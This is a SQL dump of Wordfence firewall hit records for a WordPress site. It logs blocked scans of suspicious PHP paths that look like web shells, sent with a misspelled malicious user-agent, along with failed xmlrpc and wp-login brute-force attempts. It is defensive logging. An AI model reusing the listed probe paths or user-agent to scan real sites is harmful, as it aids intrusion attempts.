(50914, 1712082547.654355, 1712082546.638600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-atom.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWF0b20ucGhw","category":"brute-force","ssl":1}'),
(50674, 1711731872.868407, 1711731872.194300, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/Cache/Cache.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL0NhY2hlL0NhY2hlLnBocA==","category":"brute-force","ssl":1}'),
(50449, 1711359179.070598, 1711359178.699600, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/alfanew.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(50864, 1712062420.771887, 1712062420.300600, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/makeasmtp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21ha2Vhc210cC5waHA=","category":"brute-force","ssl":1}'),
(50689, 1711795038.326746, 1711795037.669200, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php', NULL, 'ALittle Client', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"QUxpdHRsZSBDbGllbnQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaXZpY3JtL2Npdmljcm0vcGFja2FnZXMvT3BlbkZsYXNoQ2hhcnQvcGhwLW9mYy1saWJyYXJ5L29mY191cGxvYWRfaW1hZ2UucGhw","category":"brute-force","ssl":1}'),
(50922, 1712082503.034416, 1712082502.204800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/ini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luaS5waHA=","category":"brute-force","ssl":1}'),
(50923, 1712082497.444666, 1712082496.762200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/themes.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(50921, 1712082506.676402, 1712082505.921300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/as.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FzLnBocA==","category":"brute-force","ssl":1}'),
(50671, 1711731877.981763, 1711731877.557100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vcmVwZWF0ZXIucGhw","category":"brute-force","ssl":1}'),
(50694, 0.000000, 1711809341.544571, '\0\0\0\0\0\0\0\0\0\0ÿÿÎTf', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50695, 1711810315.466205, 1711810315.148200, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-admin/dropdown.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(50809, 1712000126.934259, 1712000125.598200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(50696, 1711810313.423724, 1711810313.016800, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/class.api.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NsYXNzLmFwaS5waHA=","category":"brute-force","ssl":1}'),
(50721, 1711858479.238663, 1711858478.160600, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çöª', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/apikey/apikey.php?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==","category":"brute-force","ssl":1}'),
(50722, 0.000000, 1711863542.119995, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL);
INSERT INTO `wpou_wfhits` VALUES
(50723, 0.000000, 1711863543.290428, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50724, 0.000000, 1711863544.976539, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50725, 0.000000, 1711863545.993252, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//wp-login.php', 'https://happythinking.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50726, 0.000000, 1711863546.999811, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//wp-login.php', 'https://happythinking.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50727, 0.000000, 1711863548.189650, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//wp-login.php', 'https://happythinking.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50728, 0.000000, 1711863549.231607, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//wp-login.php', 'https://happythinking.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50729, 0.000000, 1711863550.058883, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//wp-login.php', 'https://happythinking.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50730, 0.000000, 1711863550.923107, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 0, 200, 0, 0, 0, 'https://happythinking.com//wp-login.php', 'https://happythinking.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50731, 0.000000, 1711868929.736349, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í6‚', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50732, 0.000000, 1711886893.021471, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50733, 1711887450.330451, 1711887449.885300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 503, 0, 0, 0, 'https://happythinking.howequipmentworks.com/inputs.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L2lucHV0cy5waHA="}'),
(50734, 1711887449.215101, 1711887448.783600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 503, 0, 0, 0, 'https://happythinking.howequipmentworks.com/inputs.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L2lucHV0cy5waHA="}'),
(50735, 1711906169.727617, 1711906169.272600, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50736, 1711910717.263924, 1711910716.720100, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50899, 1712082219.486255, 1712082219.049900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50845, 1712062380.957901, 1712062380.494000, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(50804, 1712000216.837364, 1712000216.399500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(50737, 1711908215.153975, 1711908214.796800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/plugins/dummyyummy/wp-signup.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9kdW1teXl1bW15L3dwLXNpZ251cC5waHA=","category":"brute-force","ssl":1}'),
(50835, 1712011448.205809, 1712011447.687800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/digital-download/new.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2RpZ2l0YWwtZG93bmxvYWQvbmV3LnBocA==","category":"brute-force","ssl":1}'),
(50803, 1712000245.224417, 1712000244.549300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(50738, 1711908211.383792, 1711908211.000100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-admin/dropdown.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(50739, 1711908206.379449, 1711908205.952500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/epinyins.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2VwaW55aW5zLnBocA==","category":"brute-force","ssl":1}'),
